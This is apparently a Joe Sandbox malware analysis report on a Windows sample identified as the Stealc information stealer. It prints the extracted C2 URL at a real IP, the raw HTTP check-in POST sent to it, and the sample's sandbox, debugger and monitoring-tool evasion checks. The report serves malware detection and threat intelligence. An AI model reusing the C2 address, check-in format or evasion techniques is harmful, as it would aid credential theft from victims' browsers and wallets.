Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532981
MD5:9fa6a87d6ac6c29173f38b8de4ea7272
SHA1:c333a6778cc153fdbbadccc1cda4f575103c818c
SHA256:56b3a862526d4a5ae4311c3b742a7a42cd6206939944458e3566694b1cddf0ba
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9FA6A87D6AC6C29173F38B8DE4EA7272)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5588JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5588JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.730000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T08:58:08.073470+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.730000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0073C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00737240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00737240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00739AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00739AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00739B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00739B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00748EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00748EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00744910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0073DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0073E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00744570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00744570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0073ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0073BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00743EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073F68A FindFirstFileA,0_2_0073F68A

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 33 44 46 45 45 30 31 45 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"2C3DFEE01E4F4033060071------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"doma------JKKFIIEBKEGIEBFIJKFI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00736280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00736280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 33 44 46 45 45 30 31 45 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"2C3DFEE01E4F4033060071------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"doma------JKKFIIEBKEGIEBFIJKFI--
                Source: file.exe, 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2170845587.0000000001440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phphS)
                Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
                Source: file.exe, 00000000.00000002.2170845587.0000000001426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB0_2_00AFC0DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD780C0_2_00AD780C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC10430_2_00BC1043
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B939C60_2_00B939C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AE9770_2_009AE977
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF8AFE0_2_00AF8AFE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A25A5C0_2_00A25A5C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A2CFA0_2_009A2CFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF04000_2_00AF0400
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFDC4D0_2_00AFDC4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B055250_2_00B05525
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B07E9C0_2_00B07E9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFA6DB0_2_00AFA6DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC86060_2_00AC8606
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFF7B70_2_00AFF7B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF6FE00_2_00AF6FE0
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: lyglkzel ZLIB complexity 0.9946942065135542
                Source: file.exe, 00000000.00000003.2036482176.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00749600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00743720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\48Y782M4.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1856512 > 1048576
                Source: file.exeStatic PE information: Raw size of lyglkzel is bigger than: 0x100000 < 0x19f000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.730000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lyglkzel:EW;njsekajy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lyglkzel:EW;njsekajy:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00749860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ccae4 should be: 0x1d13a0
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: lyglkzel
                Source: file.exeStatic PE information: section name: njsekajy
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA0EF push edx; mov dword ptr [esp], 3EAFA226h0_2_00DCA10A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA0EF push 64CE05C3h; mov dword ptr [esp], ebp0_2_00DCA15D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7C88C push ecx; mov dword ptr [esp], ebx0_2_00B7C8C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD8082 push eax; mov dword ptr [esp], 3FFB79F5h0_2_00BD83B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074B035 push ecx; ret 0_2_0074B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B258E0 push eax; mov dword ptr [esp], edi0_2_00B25921
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 39FB0514h; mov dword ptr [esp], ebp0_2_00AFC0EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push edx; mov dword ptr [esp], esp0_2_00AFC118
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 0FF68C04h; mov dword ptr [esp], ebx0_2_00AFC12C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push edx; mov dword ptr [esp], esi0_2_00AFC194
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 22340554h; mov dword ptr [esp], ebx0_2_00AFC1FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ecx; mov dword ptr [esp], edx0_2_00AFC242
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 01A284E3h; mov dword ptr [esp], edi0_2_00AFC26C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ebp; mov dword ptr [esp], ebx0_2_00AFC314
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 13613DFEh; mov dword ptr [esp], ebx0_2_00AFC379
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 1817E9D8h; mov dword ptr [esp], edi0_2_00AFC44D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 03177B71h; mov dword ptr [esp], esi0_2_00AFC4C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push edi; mov dword ptr [esp], ebx0_2_00AFC55E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ebx; mov dword ptr [esp], 55FC2DDFh0_2_00AFC5A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ecx; mov dword ptr [esp], edx0_2_00AFC623
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 15731E63h; mov dword ptr [esp], eax0_2_00AFC670
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push edx; mov dword ptr [esp], ebx0_2_00AFC67F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push edx; mov dword ptr [esp], eax0_2_00AFC692
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ebp; mov dword ptr [esp], edi0_2_00AFC6FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ecx; mov dword ptr [esp], edx0_2_00AFC717
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ecx; mov dword ptr [esp], ebp0_2_00AFC77C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ebx; mov dword ptr [esp], ecx0_2_00AFC796
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 546EBD69h; mov dword ptr [esp], ebp0_2_00AFC7C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push edx; mov dword ptr [esp], ebx0_2_00AFC7F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push 025FD4A7h; mov dword ptr [esp], ecx0_2_00AFC91C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AFC0DB push ecx; mov dword ptr [esp], esi0_2_00AFC949
                Source: file.exeStatic PE information: section name: lyglkzel entropy: 7.95357659859666

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00749860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13432
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9919BE second address: 9919C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9919C8 second address: 9919CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0F37B second address: B0F37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E310 second address: B0E316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E669 second address: B0E676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FF154EB226Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E676 second address: B0E682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF154CE361Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E7BE second address: B0E7F2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF154EB2266h 0x00000008 jmp 00007FF154EB226Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FF154EB2270h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
